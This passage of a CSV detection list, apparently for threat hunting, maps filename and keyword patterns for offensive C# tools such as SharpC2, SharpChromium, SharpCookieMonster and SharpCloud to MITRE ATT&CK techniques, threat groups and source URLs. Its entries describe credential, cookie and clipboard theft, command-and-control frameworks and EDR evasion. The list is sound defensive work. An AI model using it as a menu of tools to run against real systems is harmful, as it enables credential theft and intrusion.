T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SharpBypassUAC.exe*",".{0,1000}SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools.
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpC2 *",".{0,1000}SharpC2\s.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2*.cs*",".{0,1000}SharpC2.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2*.exe*",".{0,1000}SharpC2.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*sharpc2*client-windows.zip*",".{0,1000}sharpc2.{0,1000}client\-windows\.zip.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2.*",".{0,1000}SharpC2\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2.API*",".{0,1000}SharpC2\.API.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2Event*",".{0,1000}SharpC2Event.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2Hub*",".{0,1000}SharpC2Hub.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SharpC2Webhook*",".{0,1000}SharpC2Webhook.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" 
"*SharpCalendar.exe*",".{0,1000}SharpCalendar\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z" "*SharpCat.exe*",".{0,1000}SharpCat\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. 
For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","17","3","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" "*SharpChisel.exe*",".{0,1000}SharpChisel\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpChrome backupkey*",".{0,1000}SharpChrome\sbackupkey.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpChrome.cs*",".{0,1000}SharpChrome\.cs.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpChrome.exe*",".{0,1000}SharpChrome\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*sharpchromium *",".{0,1000}sharpchromium\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpChromium.csproj*",".{0,1000}SharpChromium\.csproj.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*SharpChromium.exe*",".{0,1000}SharpChromium\.exe.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*SharpChromium.exe*",".{0,1000}SharpChromium\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpChromium.sln*",".{0,1000}SharpChromium\.sln.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*SharpChromium-master*",".{0,1000}SharpChromium\-master.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*SharpClipHistory*",".{0,1000}SharpClipHistory.{0,1000}","offensive_tool_keyword","SharpClipHistory","SharpClipHistory is a .NET 4.5 application written in C# that can be used to read the contents of a users clipboard history in Windows 10 starting from the 1809 Build.","T1115 - T1113 - T1015 - T1053 - T1059","TA0003 - TA0007","N/A","N/A","Information Gathering","https://github.com/FSecureLABS/SharpClipHistory","1","1","N/A","N/A","2","188","33","2020-01-23T13:39:13Z","2019-04-25T22:17:08Z" 
"*sharpcloud.cna*",".{0,1000}sharpcloud\.cna.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCloud.csproj*",".{0,1000}SharpCloud\.csproj.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCloud.exe*",".{0,1000}SharpCloud\.exe.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCloud.exe*",".{0,1000}SharpCloud\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpCloud.sln*",".{0,1000}SharpCloud\.sln.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCloud-master*",".{0,1000}SharpCloud\-master.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCOM.exe*",".{0,1000}SharpCOM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpCOMManager.cs*",".{0,1000}SharpCOMManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*sharpcompile*.exe*",".{0,1000}sharpcompile.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*sharpCompileHandler*",".{0,1000}sharpCompileHandler.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*SharpCompileServer*",".{0,1000}SharpCompileServer.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*SharpCompileServer.exe*",".{0,1000}SharpCompileServer\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*SharpConfigParser.dll*",".{0,1000}SharpConfigParser\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*sharpcookiemonster*",".{0,1000}sharpcookiemonster.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - 
T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpCookieMonster*WebSocket4Net.dll*",".{0,1000}SharpCookieMonster.{0,1000}WebSocket4Net\.dll.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","197","45","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCookieMonster.csproj*",".{0,1000}SharpCookieMonster\.csproj.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","197","45","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCookieMonster.exe*",".{0,1000}SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpCookieMonster.exe*",".{0,1000}SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","197","45","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCookieMonster.sln*",".{0,1000}SharpCookieMonster\.sln.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","197","45","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCookieMonsterOriginal.exe*",".{0,1000}SharpCookieMonsterOriginal\.exe.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. 
